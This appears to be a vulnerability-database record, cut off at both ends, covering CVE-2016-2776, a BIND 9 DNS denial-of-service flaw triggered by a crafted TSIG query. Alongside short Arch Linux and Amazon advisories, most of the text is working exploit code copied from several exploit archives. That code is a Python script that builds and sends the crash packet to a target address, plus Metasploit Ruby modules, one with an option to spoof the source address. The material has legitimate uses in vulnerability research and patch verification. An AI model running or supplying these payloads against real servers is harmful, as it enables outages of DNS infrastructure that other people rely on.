socket.SOCK_DGRAM)\n s.sendto(bombita, TARGET)\n s.close()\n\n'''\n##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core'\nrequire 'timeout'\nrequire 'socket'\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Capture\n include Msf::Auxiliary::UDPScanner\n include Msf::Auxiliary::Dos\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'BIND 9 DoS CVE-2016-2776',\n 'Description' => %q{\n Denial of Service Bind 9 DNS Server CVE-2016-2776.\n Critical error condition which can occur when a nameserver is constructing a response.\n A defect in the rendering of messages into packets can cause named to exit with an\n assertion failure in buffer.c while constructing a response to a query that meets certain criteria.\n\n This assertion can be triggered even if the apparent source address isnt allowed\n to make queries.\n },\n # Research and Original PoC - msf module author\n 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2016-2776' ],\n [ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ]\n ],\n 'DisclosureDate' => 'Sep 27 2016',\n 'DefaultOptions' => {'ScannerRecvWindow' => 0}\n ))\n\n register_options([\n Opt::RPORT(53),\n OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])\n ])\n\n deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')\n end\n\n def check_server_status(ip, rport)\n res = \"\"\n sudp = UDPSocket.new\n sudp.send(valid_query, 0, ip, rport)\n begin\n Timeout.timeout(5) do\n res = sudp.recv(100)\n end\n rescue Timeout::Error\n end\n\n if(res.length==0)\n print_good(\"Exploit Success (Maybe, nameserver did not replied)\")\n else\n print_error(\"Exploit Failed\")\n end\n end\n\n def scan_host(ip)\n @flag_success = true\n print_status(\"Sending bombita (Specially crafted udp packet) to: \"+ip)\n scanner_send(payload, ip, rport)\n check_server_status(ip, rport)\n end\n\n def get_domain\n domain = \"\\x06\"+Rex::Text.rand_text_alphanumeric(6)\n org = \"\\x03\"+Rex::Text.rand_text_alphanumeric(3)\n get_domain = domain+org\n end\n\n def payload\n query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65\n query += \"\\x00\\x00\" # Flags: 0x0000 Standard query\n query += \"\\x00\\x01\" # Questions: 1\n query += \"\\x00\\x00\" # Answer RRs: 0\n query += \"\\x00\\x00\" # Authority RRs: 0\n query += \"\\x00\\x01\" # Additional RRs: 1\n\n # Doman Name\n query += get_domain # Random DNS Name\n query += \"\\x00\" # [End of name]\n query += \"\\x00\\x01\" # Type: A (Host Address) (1)\n query += \"\\x00\\x01\" # Class: IN (0x0001)\n\n # Aditional records. Name\n query += (\"\\x3f\"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes\n query += \"\\x3d\"+Rex::Text.rand_text_alphanumeric(61)\n query += \"\\x00\"\n\n query += \"\\x00\\xfa\" # Type: TSIG (Transaction Signature) (250)\n query += \"\\x00\\xff\" # Class: ANY (0x00ff)\n query += \"\\x00\\x00\\x00\\x00\" # Time to live: 0\n query += \"\\x00\\xfc\" # Data length: 252\n\n # Algorithm Name\n query += (\"\\x3f\"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes\n query += \"\\x1A\"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes\n query += \"\\x00\"\n\n # Rest of TSIG\n query += \"\\x00\\x00\"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART\n query += \"\\x01\\x2c\" # Fudge: 300\n query += \"\\x00\\x10\" # MAC Size: 16\n query += Rex::Text.rand_text_alphanumeric(16) # MAC\n query += \"\\x8f\\x65\" # Original Id: 36709\n query += \"\\x00\\x00\" # Error: No error (0)\n query += \"\\x00\\x00\" # Other len: 0\n end\n\n def valid_query\n query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65\n query += \"\\x00\\x00\" # Flags: 0x0000 Standard query\n query += \"\\x00\\x01\" # Questions: 1\n query += \"\\x00\\x00\" # Answer RRs: 0\n query += \"\\x00\\x00\" # Authority RRs: 0\n query += \"\\x00\\x00\" # Additional RRs: 0\n\n # Doman Name\n query += get_domain # Random DNS Name\n query += \"\\x00\" # [End of name]\n query += \"\\x00\\x01\" # Type: A (Host Address) (1)\n query += \"\\x00\\x01\" # Class: IN (0x0001)s\n end\n\nend\n'''", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:45", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "Arch Linux Security Advisory ASA-201609-29\n==========================================\n\nSeverity: High\nDate : 2016-09-27\nCVE-ID : CVE-2016-2776\nPackage : bind\nType : denial of service\nRemote : Yes\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package bind before version 9.10.4.P3-1 is vulnerable to denial of\nservice.\n\nResolution\n==========\n\nUpgrade to 9.10.4.P3-1.\n\n# pacman -Syu \"bind>=9.10.4.P3-1\"\n\nThe problem has been fixed upstream in version 9.10.4.P3.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nTesting by ISC has uncovered a critical error condition which can occur\nwhen a nameserver is constructing a response. A defect in the\nrendering of messages into packets can cause 'named' to exit with an\nassertion failure in buffer.c while constructing a response to a query\nthat meets certain criteria.\nThis assertion can be triggered even if the apparent source address\nisn't allowed to make queries (i.e. doesn't match 'allow-query').\n\nImpact\n======\n\nA remote attacker is able to perform a denial of service attack via a\nspecially crafted request.\n\nReferences\n==========\n\nhttps://kb.isc.org/article/AA-01419/0\nhttps://access.redhat.com/security/cve/CVE-2016-2776", "modified": "2016-09-27T00:00:00", "published": "2016-09-27T00:00:00", "id": "ASA-201609-29", "href": "https://security.archlinux.org/ASA-201609-29", "type": "archlinux", "title": "[ASA-201609-29] bind: denial of service", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:36:20", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2776"], "description": "**Issue Overview:**\n\nA denial of service flaw was found in the way BIND constructed a response to a query that met certain criteria. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS request packet.\n\n \n**Affected Packages:** \n\n\nbind\n\n \n**Issue Correction:** \nRun _yum update bind_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n bind-libs-9.8.2-0.37.rc1.48.amzn1.i686 \n bind-debuginfo-9.8.2-0.37.rc1.48.amzn1.i686 \n bind-sdb-9.8.2-0.37.rc1.48.amzn1.i686 \n bind-utils-9.8.2-0.37.rc1.48.amzn1.i686 \n bind-9.8.2-0.37.rc1.48.amzn1.i686 \n bind-devel-9.8.2-0.37.rc1.48.amzn1.i686 \n bind-chroot-9.8.2-0.37.rc1.48.amzn1.i686 \n \n src: \n bind-9.8.2-0.37.rc1.48.amzn1.src \n \n x86_64: \n bind-sdb-9.8.2-0.37.rc1.48.amzn1.x86_64 \n bind-chroot-9.8.2-0.37.rc1.48.amzn1.x86_64 \n bind-9.8.2-0.37.rc1.48.amzn1.x86_64 \n bind-libs-9.8.2-0.37.rc1.48.amzn1.x86_64 \n bind-devel-9.8.2-0.37.rc1.48.amzn1.x86_64 \n bind-debuginfo-9.8.2-0.37.rc1.48.amzn1.x86_64 \n bind-utils-9.8.2-0.37.rc1.48.amzn1.x86_64 \n \n \n", "edition": 3, "modified": "2016-09-28T15:45:00", "published": "2016-09-28T15:45:00", "id": "ALAS-2016-751", "href": "https://alas.aws.amazon.com/ALAS-2016-751.html", "title": "Important: bind", "type": "amazon", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "zdt": [{"lastseen": "2018-01-01T07:18:27", "description": "Exploit for multiple platform in category dos / poc", "edition": 2, "published": "2016-10-04T00:00:00", "type": "zdt", "title": "Bind 9 DNS Server - Denial of Service Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2776"], "modified": "2016-10-04T00:00:00", "id": "1337DAY-ID-25325", "href": "https://0day.today/exploit/description/25325", "sourceData": "import socket\r\nimport struct\r\n \r\nTARGET = ('192.168.200.10', 53)\r\n \r\nQ_A = 1\r\nQ_TSIG = 250\r\nDNS_MESSAGE_HEADERLEN = 12\r\n \r\n \r\ndef build_bind_nuke(question=\"\\x06google\\x03com\\x00\", udpsize=512):\r\n query_A = \"\\x8f\\x65\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\" + question + int16(Q_A) + \"\\x00\\x01\"\r\n \r\n sweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1\r\n tsig_rr = build_tsig_rr(sweet_spot)\r\n \r\n return query_A + tsig_rr\r\n \r\ndef int16(n):\r\n return struct.pack(\"!H\", n)\r\n \r\ndef build_tsig_rr(bind_demarshalled_size):\r\n signature_data = (\"\\x00\\x00\\x57\\xeb\\x80\\x14\\x01\\x2c\\x00\\x10\\xd2\\x2b\\x32\\x13\\xb0\\x09\"\r\n \"\\x46\\x34\\x21\\x39\\x58\\x62\\xf3\\xd5\\x9c\\x8b\\x8f\\x65\\x00\\x00\\x00\\x00\")\r\n tsig_rr_extra_fields = \"\\x00\\xff\\x00\\x00\\x00\\x00\"\r\n \r\n necessary_bytes = len(signature_data) + len(tsig_rr_extra_fields)\r\n necessary_bytes += 2 + 2 # length fields\r\n \r\n # from sizeof(TSIG RR) bytes conforming the TSIG RR\r\n # bind9 uses sizeof(TSIG RR) - 16 to build its own\r\n sign_name, algo_name = generate_padding(bind_demarshalled_size - necessary_bytes + 16)\r\n \r\n tsig_hdr = sign_name + int16(Q_TSIG) + tsig_rr_extra_fields\r\n tsig_data = algo_name + signature_data\r\n return tsig_hdr + int16(len(tsig_data)) + tsig_data\r\n \r\ndef generate_padding(n):\r\n max_per_bucket = [0x3f, 0x3f, 0x3f, 0x3d, 0x3f, 0x3f, 0x3f, 0x3d]\r\n buckets = [1] * len(max_per_bucket)\r\n \r\n min_size = len(buckets) * 2 + 2 # 2 bytes for every bucket plus each null byte\r\n max_size = sum(max_per_bucket) + len(buckets) + 2\r\n \r\n if not(min_size <= n <= max_size):\r\n raise RuntimeException(\"unsupported amount of bytes\")\r\n \r\n curr_idx, n = 0, n - min_size\r\n while n > 0:\r\n next_n = max(n - (max_per_bucket[curr_idx] - 1), 0)\r\n buckets[curr_idx] = 1 + n - next_n\r\n n, curr_idx = next_n, curr_idx + 1\r\n \r\n n_padding = lambda amount: chr(amount) + \"A\" * amount\r\n stringify = lambda sizes: \"\".join(map(n_padding, sizes)) + \"\\x00\"\r\n \r\n return stringify(buckets[:4]), stringify(buckets[4:])\r\n \r\nif __name__ == \"__main__\":\r\n bombita = build_bind_nuke()\r\n \r\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n s.sendto(bombita, TARGET)\r\n s.close()\r\n \r\n'''\r\n##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\nrequire 'timeout'\r\nrequire 'socket'\r\n \r\nclass MetasploitModule < Msf::Auxiliary\r\n \r\n include Msf::Exploit::Capture\r\n include Msf::Auxiliary::UDPScanner\r\n include Msf::Auxiliary::Dos\r\n include Msf::Auxiliary::Report\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'BIND 9 DoS CVE-2016-2776',\r\n 'Description' => %q{\r\n Denial of Service Bind 9 DNS Server CVE-2016-2776.\r\n Critical error condition which can occur when a nameserver is constructing a response.\r\n A defect in the rendering of messages into packets can cause named to exit with an\r\n assertion failure in buffer.c while constructing a response to a query that meets certain criteria.\r\n \r\n This assertion can be triggered even if the apparent source address isnt allowed\r\n to make queries.\r\n },\r\n # Research and Original PoC - msf module author\r\n 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2016-2776' ],\r\n [ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ]\r\n ],\r\n 'DisclosureDate' => 'Sep 27 2016',\r\n 'DefaultOptions' => {'ScannerRecvWindow' => 0}\r\n ))\r\n \r\n register_options([\r\n Opt::RPORT(53),\r\n OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])\r\n ])\r\n \r\n deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')\r\n end\r\n \r\n def check_server_status(ip, rport)\r\n res = \"\"\r\n sudp = UDPSocket.new\r\n sudp.send(valid_query, 0, ip, rport)\r\n begin\r\n Timeout.timeout(5) do\r\n res = sudp.recv(100)\r\n end\r\n rescue Timeout::Error\r\n end\r\n \r\n if(res.length==0)\r\n print_good(\"Exploit Success (Maybe, nameserver did not replied)\")\r\n else\r\n print_error(\"Exploit Failed\")\r\n end\r\n end\r\n \r\n def scan_host(ip)\r\n @flag_success = true\r\n print_status(\"Sending bombita (Specially crafted udp packet) to: \"+ip)\r\n scanner_send(payload, ip, rport)\r\n check_server_status(ip, rport)\r\n end\r\n \r\n def get_domain\r\n domain = \"\\x06\"+Rex::Text.rand_text_alphanumeric(6)\r\n org = \"\\x03\"+Rex::Text.rand_text_alphanumeric(3)\r\n get_domain = domain+org\r\n end\r\n \r\n def payload\r\n query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65\r\n query += \"\\x00\\x00\" # Flags: 0x0000 Standard query\r\n query += \"\\x00\\x01\" # Questions: 1\r\n query += \"\\x00\\x00\" # Answer RRs: 0\r\n query += \"\\x00\\x00\" # Authority RRs: 0\r\n query += \"\\x00\\x01\" # Additional RRs: 1\r\n \r\n # Doman Name\r\n query += get_domain # Random DNS Name\r\n query += \"\\x00\" # [End of name]\r\n query += \"\\x00\\x01\" # Type: A (Host Address) (1)\r\n query += \"\\x00\\x01\" # Class: IN (0x0001)\r\n \r\n # Aditional records. Name\r\n query += (\"\\x3f\"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes\r\n query += \"\\x3d\"+Rex::Text.rand_text_alphanumeric(61)\r\n query += \"\\x00\"\r\n \r\n query += \"\\x00\\xfa\" # Type: TSIG (Transaction Signature) (250)\r\n query += \"\\x00\\xff\" # Class: ANY (0x00ff)\r\n query += \"\\x00\\x00\\x00\\x00\" # Time to live: 0\r\n query += \"\\x00\\xfc\" # Data length: 252\r\n \r\n # Algorithm Name\r\n query += (\"\\x3f\"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes\r\n query += \"\\x1A\"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes\r\n query += \"\\x00\"\r\n \r\n # Rest of TSIG\r\n query += \"\\x00\\x00\"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART\r\n query += \"\\x01\\x2c\" # Fudge: 300\r\n query += \"\\x00\\x10\" # MAC Size: 16\r\n query += Rex::Text.rand_text_alphanumeric(16) # MAC\r\n query += \"\\x8f\\x65\" # Original Id: 36709\r\n query += \"\\x00\\x00\" # Error: No error (0)\r\n query += \"\\x00\\x00\" # Other len: 0\r\n end\r\n \r\n def valid_query\r\n query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65\r\n query += \"\\x00\\x00\" # Flags: 0x0000 Standard query\r\n query += \"\\x00\\x01\" # Questions: 1\r\n query += \"\\x00\\x00\" # Answer RRs: 0\r\n query += \"\\x00\\x00\" # Authority RRs: 0\r\n query += \"\\x00\\x00\" # Additional RRs: 0\r\n \r\n # Doman Name\r\n query += get_domain # Random DNS Name\r\n query += \"\\x00\" # [End of name]\r\n query += \"\\x00\\x01\" # Type: A (Host Address) (1)\r\n query += \"\\x00\\x01\" # Class: IN (0x0001)s\r\n end\r\n \r\nend\r\n'''\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25325"}], "metasploit": [{"lastseen": "2020-10-07T20:39:38", "description": "A defect in the rendering of messages into packets can cause named to exit with an assertion failure in buffer.c while constructing a response to a query that meets certain criteria. This assertion can be triggered even if the apparent source address isn't allowed to make queries.\n", "published": "2017-08-26T15:41:10", "type": "metasploit", "title": "BIND TSIG Query Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2776"], "modified": "2020-10-02T20:00:37", "id": "MSF:AUXILIARY/DOS/DNS/BIND_TSIG", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Capture\n include Msf::Auxiliary::UDPScanner\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BIND TSIG Query Denial of Service',\n 'Description' => %q{\n A defect in the rendering of messages into packets can cause named to\n exit with an assertion failure in buffer.c while constructing a response\n to a query that meets certain criteria.\n\n This assertion can be triggered even if the apparent source address\n isn't allowed to make queries.\n },\n # Research and Original PoC - msf module author\n 'Author' => [\n 'Martin Rocha',\n 'Ezequiel Tavella',\n 'Alejandro Parodi',\n 'Infobyte Research Team'\n ],\n 'References' => [\n ['CVE', '2016-2776'],\n ['URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html']\n ],\n 'DisclosureDate' => '2016-09-27',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {'ScannerRecvWindow' => 0}\n ))\n\n register_options([\n Opt::RPORT(53),\n OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])\n ])\n\n deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')\n end\n\n def scan_host(ip)\n if datastore['SRC_ADDR']\n scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])\n else\n print_status(\"Sending packet to #{ip}\")\n scanner_send(payload, ip, rport)\n end\n end\n\n def payload\n query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65\n query << \"\\x00\\x00\" # Flags: 0x0000 Standard query\n query << \"\\x00\\x01\" # Questions: 1\n query << \"\\x00\\x00\" # Answer RRs: 0\n query << \"\\x00\\x00\" # Authority RRs: 0\n query << \"\\x00\\x01\" # Additional RRs: 1\n\n # Domain Name\n query << get_domain # Random DNS Name\n query << \"\\x00\" # [End of name]\n query << \"\\x00\\x01\" # Type: A (Host Address) (1)\n query << \"\\x00\\x01\" # Class: IN (0x0001)\n\n # Additional records. Name\n query << (\"\\x3f\"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes\n query << \"\\x3d\"+Rex::Text.rand_text_alphanumeric(61)\n query << \"\\x00\"\n\n query << \"\\x00\\xfa\" # Type: TSIG (Transaction Signature) (250)\n query << \"\\x00\\xff\" # Class: ANY (0x00ff)\n query << \"\\x00\\x00\\x00\\x00\" # Time to live: 0\n query << \"\\x00\\xfc\" # Data length: 252\n\n # Algorithm Name\n query << (\"\\x3f\"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes\n query << \"\\x1A\"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes\n query << \"\\x00\"\n\n # Rest of TSIG\n query << \"\\x00\\x00\"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART\n query << \"\\x01\\x2c\" # Fudge: 300\n query << \"\\x00\\x10\" # MAC Size: 16\n query << Rex::Text.rand_text_alphanumeric(16) # MAC\n query << \"\\x8f\\x65\" # Original Id: 36709\n query << \"\\x00\\x00\" # Error: No error (0)\n query << \"\\x00\\x00\" # Other len: 0\n end\n\n def get_domain\n domain = \"\\x06\"+Rex::Text.rand_text_alphanumeric(6)\n org = \"\\x03\"+Rex::Text.rand_text_alphanumeric(3)\n domain+org\n end\nend\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/dns/bind_tsig.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:18:58", "description": "", "published": "2016-10-04T00:00:00", "type": "packetstorm", "title": "BIND 9 DNS Server Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2776"], "modified": "2016-10-04T00:00:00", "id": "PACKETSTORM:138960", "href": "https://packetstormsecurity.com/files/138960/BIND-9-DNS-Server-Denial-Of-Service.html", "sourceData": "`import socket \nimport struct \n \nTARGET = ('192.168.200.10', 53) \n \nQ_A = 1 \nQ_TSIG = 250 \nDNS_MESSAGE_HEADERLEN = 12 \n \n \ndef build_bind_nuke(question=\"\\x06google\\x03com\\x00\", udpsize=512): \nquery_A = \"\\x8f\\x65\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\" + question + int16(Q_A) + \"\\x00\\x01\" \n \nsweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1 \ntsig_rr = build_tsig_rr(sweet_spot) \n \nreturn query_A + tsig_rr \n \ndef int16(n): \nreturn struct.pack(\"!H\", n) \n \ndef build_tsig_rr(bind_demarshalled_size): \nsignature_data = (\"\\x00\\x00\\x57\\xeb\\x80\\x14\\x01\\x2c\\x00\\x10\\xd2\\x2b\\x32\\x13\\xb0\\x09\" \n\"\\x46\\x34\\x21\\x39\\x58\\x62\\xf3\\xd5\\x9c\\x8b\\x8f\\x65\\x00\\x00\\x00\\x00\") \ntsig_rr_extra_fields = \"\\x00\\xff\\x00\\x00\\x00\\x00\" \n \nnecessary_bytes = len(signature_data) + len(tsig_rr_extra_fields) \nnecessary_bytes += 2 + 2 # length fields \n \n# from sizeof(TSIG RR) bytes conforming the TSIG RR \n# bind9 uses sizeof(TSIG RR) - 16 to build its own \nsign_name, algo_name = generate_padding(bind_demarshalled_size - necessary_bytes + 16) \n \ntsig_hdr = sign_name + int16(Q_TSIG) + tsig_rr_extra_fields \ntsig_data = algo_name + signature_data \nreturn tsig_hdr + int16(len(tsig_data)) + tsig_data \n \ndef generate_padding(n): \nmax_per_bucket = [0x3f, 0x3f, 0x3f, 0x3d, 0x3f, 0x3f, 0x3f, 0x3d] \nbuckets = [1] * len(max_per_bucket) \n \nmin_size = len(buckets) * 2 + 2 # 2 bytes for every bucket plus each null byte \nmax_size = sum(max_per_bucket) + len(buckets) + 2 \n \nif not(min_size <= n <= max_size): \nraise RuntimeException(\"unsupported amount of bytes\") \n \ncurr_idx, n = 0, n - min_size \nwhile n > 0: \nnext_n = max(n - (max_per_bucket[curr_idx] - 1), 0) \nbuckets[curr_idx] = 1 + n - next_n \nn, curr_idx = next_n, curr_idx + 1 \n \nn_padding = lambda amount: chr(amount) + \"A\" * amount \nstringify = lambda sizes: \"\".join(map(n_padding, sizes)) + \"\\x00\" \n \nreturn stringify(buckets[:4]), stringify(buckets[4:]) \n \nif __name__ == \"__main__\": \nbombita = build_bind_nuke() \n \ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \ns.sendto(bombita, TARGET) \ns.close() \n \n''' \n## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \nrequire 'timeout' \nrequire 'socket' \n \nclass MetasploitModule < Msf::Auxiliary \n \ninclude Msf::Exploit::Capture \ninclude Msf::Auxiliary::UDPScanner \ninclude Msf::Auxiliary::Dos \ninclude Msf::Auxiliary::Report \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'BIND 9 DoS CVE-2016-2776', \n'Description' => %q{ \nDenial of Service Bind 9 DNS Server CVE-2016-2776. \nCritical error condition which can occur when a nameserver is constructing a response. \nA defect in the rendering of messages into packets can cause named to exit with an \nassertion failure in buffer.c while constructing a response to a query that meets certain criteria. \n \nThis assertion can be triggered even if the apparent source address isnt allowed \nto make queries. \n}, \n# Research and Original PoC - msf module author \n'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2016-2776' ], \n[ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ] \n], \n'DisclosureDate' => 'Sep 27 2016', \n'DefaultOptions' => {'ScannerRecvWindow' => 0} \n)) \n \nregister_options([ \nOpt::RPORT(53), \nOptAddress.new('SRC_ADDR', [false, 'Source address to spoof']) \n]) \n \nderegister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') \nend \n \ndef check_server_status(ip, rport) \nres = \"\" \nsudp = UDPSocket.new \nsudp.send(valid_query, 0, ip, rport) \nbegin \nTimeout.timeout(5) do \nres = sudp.recv(100) \nend \nrescue Timeout::Error \nend \n \nif(res.length==0) \nprint_good(\"Exploit Success (Maybe, nameserver did not replied)\") \nelse \nprint_error(\"Exploit Failed\") \nend \nend \n \ndef scan_host(ip) \n@flag_success = true \nprint_status(\"Sending bombita (Specially crafted udp packet) to: \"+ip) \nscanner_send(payload, ip, rport) \ncheck_server_status(ip, rport) \nend \n \ndef get_domain \ndomain = \"\\x06\"+Rex::Text.rand_text_alphanumeric(6) \norg = \"\\x03\"+Rex::Text.rand_text_alphanumeric(3) \nget_domain = domain+org \nend \n \ndef payload \nquery = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 \nquery += \"\\x00\\x00\" # Flags: 0x0000 Standard query \nquery += \"\\x00\\x01\" # Questions: 1 \nquery += \"\\x00\\x00\" # Answer RRs: 0 \nquery += \"\\x00\\x00\" # Authority RRs: 0 \nquery += \"\\x00\\x01\" # Additional RRs: 1 \n \n# Doman Name \nquery += get_domain # Random DNS Name \nquery += \"\\x00\" # [End of name] \nquery += \"\\x00\\x01\" # Type: A (Host Address) (1) \nquery += \"\\x00\\x01\" # Class: IN (0x0001) \n \n# Aditional records. Name \nquery += (\"\\x3f\"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes \nquery += \"\\x3d\"+Rex::Text.rand_text_alphanumeric(61) \nquery += \"\\x00\" \n \nquery += \"\\x00\\xfa\" # Type: TSIG (Transaction Signature) (250) \nquery += \"\\x00\\xff\" # Class: ANY (0x00ff) \nquery += \"\\x00\\x00\\x00\\x00\" # Time to live: 0 \nquery += \"\\x00\\xfc\" # Data length: 252 \n \n# Algorithm Name \nquery += (\"\\x3f\"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes \nquery += \"\\x1A\"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes \nquery += \"\\x00\" \n \n# Rest of TSIG \nquery += \"\\x00\\x00\"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART \nquery += \"\\x01\\x2c\" # Fudge: 300 \nquery += \"\\x00\\x10\" # MAC Size: 16 \nquery += Rex::Text.rand_text_alphanumeric(16) # MAC \nquery += \"\\x8f\\x65\" # Original Id: 36709 \nquery += \"\\x00\\x00\" # Error: No error (0) \nquery += \"\\x00\\x00\" # Other len: 0 \nend \n \ndef valid_query \nquery = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 \nquery += \"\\x00\\x00\" # Flags: 0x0000 Standard query \nquery += \"\\x00\\x01\" # Questions: 1 \nquery += \"\\x00\\x00\" # Answer RRs: 0 \nquery += \"\\x00\\x00\" # Authority RRs: 0 \nquery += \"\\x00\\x00\" # Additional RRs: 0 \n \n# Doman Name \nquery += get_domain # Random DNS Name \nquery += \"\\x00\" # [End of name] \nquery += \"\\x00\\x01\" # Type: A (Host Address) (1) \nquery += \"\\x00\\x01\" # Class: IN (0x0001)s \nend \n \nend \n`\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/138960/bind9dns-dos.txt"}], "exploitdb": [{"lastseen": "2016-10-04T21:29:05", "description": "Bind 9 DNS Server - Denial of Service. CVE-2016-2776. Dos exploit for Multiple platform", "published": "2016-10-04T00:00:00", "type": "exploitdb", "title": "Bind 9 DNS Server - Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2776"], "modified": "2016-10-04T00:00:00", "id": "EDB-ID:40453", "href": "https://www.exploit-db.com/exploits/40453/", "sourceData": "import socket\r\nimport struct\r\n\r\nTARGET = ('192.168.200.10', 53)\r\n\r\nQ_A = 1\r\nQ_TSIG = 250\r\nDNS_MESSAGE_HEADERLEN = 12\r\n\r\n\r\ndef build_bind_nuke(question=\"\\x06google\\x03com\\x00\", udpsize=512):\r\n query_A = \"\\x8f\\x65\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\" + question + int16(Q_A) + \"\\x00\\x01\"\r\n\r\n sweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1\r\n tsig_rr = build_tsig_rr(sweet_spot)\r\n\r\n return query_A + tsig_rr\r\n\r\ndef int16(n):\r\n return struct.pack(\"!H\", n)\r\n\r\ndef build_tsig_rr(bind_demarshalled_size):\r\n signature_data = (\"\\x00\\x00\\x57\\xeb\\x80\\x14\\x01\\x2c\\x00\\x10\\xd2\\x2b\\x32\\x13\\xb0\\x09\"\r\n 